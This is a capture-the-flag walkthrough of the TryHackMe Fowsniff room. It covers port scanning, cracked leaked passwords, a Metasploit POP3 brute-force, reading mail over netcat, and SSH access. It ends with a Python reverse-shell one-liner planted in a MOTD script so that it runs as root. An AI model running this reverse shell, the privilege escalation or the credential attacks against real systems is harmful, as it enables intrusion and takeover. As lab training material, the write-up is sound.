Fowsniff CTF(Tryhackme) Room Walkthrough By Jonty Bhardwaj
Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a Tryhackme machine called Fowsniff CTF.
Now first of all we will navigate to the Room URL and join it.
https://tryhackme.com/room/ctf
After starting the Machine we will first connect through Open VPN and ping the machine through the IP we are given to see if the connection is established. After we are successful in pinging the machine, we will start the fun part which is Pentesting and getting root privilege.
Now first we will start a Nmap scan to see what are the ports and services open on the machine.
nmap -sV -sT -T4 -A 10.10.168.80
Now we can see that 4 ports are open and the most promising port we can gather info looks to be port 80. Lets see what’s on the website there.
From the website we gathered that’s this corporation is hacked recently and the employee credentials are being dumped publicly on their hacked twitter handle — @fowsniffcorp.
Lets check the twitter handle to check the information and maybe get the leaked credentials for ourselves in case some employee was too lazy to change his password .
https://twitter.com/fowsniffcorp?lang=en
From the twitter handle we got that the corporation is hacked by someone named B1gN1nj4.
From the following tweet we also know that the username stone is sysadmin .
It also contained a pastebin dump of employee credentials .
Cracking the MD5 hashed we got these passwords
mauer@fowsniff: mailcall
mustikka@fowsniff: bilbo101
tegel@fowsniff: apples01
baksteen@fowsniff: skyler22
seina@fowsniff: scoobydoo2
stone@fowsniff: Not Found
mursten@fowsniff: carp4ever
parede@fowsniff: orlando12
sciana@fowsniff: 07011972
From this pastebin info we gathered many credentials which maybe changed or not and information on pop3 server that its wide open to be exploited . And looking at our nmap scan it seems the pop3 server is still open .
We then created userfile and passfile to give for bruteforce with the known credentials .
Lets try to exploit the pop3 server ourselves with bruteforcing it with a metasploit module.
msfconsole
use auxiliary/scanner/pop3/pop3_login
show options
set USER_FILE /root/userfile.txt
set PASS_FILE /root/passfile.txt
set RHOSTS 10.10.122.193
run
We got the credentials successfully
Connecting with the credentials in pop3 to see the mails
nc 10.10.168.80 110
USER seina
PASS scoobydoo2
LIST
Here we can see that there are 2 mails , lets read them with the command
RETR 1
As you can see here we have got a SSH Password — S1ck3nBluff+secureshell
We also checked the second mail and got the information that user baksteen sent that mail to seina and he was sick . So he might not have gone to office and his password may be the same temporary password .
Lets try to login with user baksteen and temporary password into ssh.
ssh baksteen@10.10.168.80
And voila we have got access to user baksteen workspace .
After searching we got a file named term.txt
cat term.txt
he file suggest use to find other phrases by person who coined the term “One Hit Wonder”.
We then searched for the files that can be run the user
find / -type f -group users 2>/dev/null
In the start itself we found an interesting shell script file and lets see if we can exploit this file to get a reverse shell .
So now we will try to use this file to run our reverse shell
which python3
We can see that python3 is installed so a python3 reverse shell will work.
nano cube.sh
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.8.107.42”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
We have successfully created a script with python reverse shell in it but we need a someone with higher privilege to run the script or another file with higher privilege to execute the script to escalate our privilege.
We know that when we connect via ssh, cube.sh is executed with a Fowsniff corp banner and cube.sh is executed with another script . maybe we can see the controlling script .
cd /etc/update-motd.d/
As we can see here there is script named 00-header which controls the cube.sh script.
And we can see that these files are created by root. Normal user has execute and read permissions only.
Now if we relogin into the ssh , the new cube.sh will be executed by the 00-header script with root permissions and we will get a reverse shell back with root permissions .
Now relogging into ssh
ssh baksteen@10.10.70.63
As soon we login into baksteen user , we got a reverse shell on our listner with root privilege
nc -lnvp 4444
cat /root/flag.txt
Here we have successfully escalated to root shell after using the exploit command and found the root flag in the root folder.
Proof of Completion